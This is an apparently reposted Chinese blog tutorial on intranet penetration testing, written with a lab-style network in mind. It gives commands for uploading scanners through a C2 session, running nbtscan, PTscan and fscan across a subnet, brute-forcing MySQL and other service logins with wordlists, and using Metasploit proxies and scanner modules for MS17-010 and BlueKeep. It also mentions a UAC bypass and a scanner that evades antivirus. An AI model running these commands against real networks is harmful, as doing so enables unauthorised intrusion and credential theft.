内网渗透测试七个步骤_内网渗透什么意思「建议收藏」

内网渗透测试七个步骤_内网渗透什么意思「建议收藏」上传nbtscan和dll程序上传后用nbtscan命令扫描内网其他网段。_内网扫描

nbtscan

Win2012

上传nbtscan和dll程序

upload D:\内网\tools\信息收集\nbtscan\nbtscan.exe

上传后用nbtscan命令扫描内网其他网段

shell nbtscan.exe 192.168.52.0/24

在这里插入图片描述

win2016

此时直接上线Win2016肯定是不行的,因为目标不出网无法访问到kali,所以要通过Win2012进行中转上线

上传nbtscan

upload D:\内网\tools\信息收集\nbtscan\nbtscan.exe

但此时运行之后,发现权限不足,尝试提权后提权失败,所以尝试bypassuac,提权后成功扫出内网主机

在这里插入图片描述

PTscan

PTscan(Phantom scanner) 是一款界面友好的轻量级web应用资产扫描器,适合于内网渗透测试环境下web的资产快捷识别,只需Python环境,无需第三方扩展库,扫描结果使用zoomeye网页样式。

下载地址:https://github.com/phantom0301/PTscan

PS:不会被杀软查杀

打包exe

installer库打包成exe下载链接

pyinstaller -F PTscan.py

使用说明

Usage: python PTscan.py { 
   -f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
PTscan.exe -h 192.168.52 -p 80 -m 10 -t 10 -n -b
-f  指定扫描目标文件,文件格式如list.txt所示,同时支持IP和URL
-h  指定扫描IP或IP段,支持段扫描,如192.168.1 即为扫描C段,192.168 即为扫描B段
-p  指定扫描端口,缺省使用程序中的配置端口
-m  指定线程数
-t  指定timeout
-n  不进行ping操作,直接扫描
-b  开启Banner识别
-r  ReverseIP

上传

upload D:\内网\tools\信息收集\PTscan-master\PTscan.exe

扫描完后,会在当然目录生成一个文件,非常直观

fscan

fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

存活主机

fscan.exe -h ip或者网段

服务爆破

fscan.exe  -h ip -m -h   查看可爆破的服务(-m指定服务类型 -h帮助命令)

mysql爆破

fscan64.exe -h 192.168.52.154 -m mysql        #使用默认的字典
fscan64.exe -h 192.168.52.154 -m mysql  -userf user.txt -pwdf passwd.txt      #使用指定的字典 

默认对全部服务爆破

fscan64.exe -h 192.168.52.154,192.168.52.157 -m all  -userf user.txt -pwdf passwd.txt 

MSF

先将cs上线的靶机创建个代理,便于CS连接

setg Proxies socks4:192.168.142.129:57374

setg ReverseAllowProxy true

windows

设置好代理后,即可使用扫描器进行扫描了

在这里插入图片描述

linux

扫linux可以用ssh_version

search ssh_version
use auxiliary/scanner/ssh/ssh_version

mssql

use auxiliary/scanner/mssql/mssql_ping

rdp

search rdp_scanner

http

search http_version
auxiliary/scanner/http/http_version

ms17_010

seach ms17_010 
use auxiliary/scanner/smb/smb_ms17_010 

2019_0708

该漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是2019年里危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

search 2019_0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 

nbname

search nbname 
use auxiliary/scanner/netbios/nbname 

今天的文章内网渗透测试七个步骤_内网渗透什么意思「建议收藏」分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/57916.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注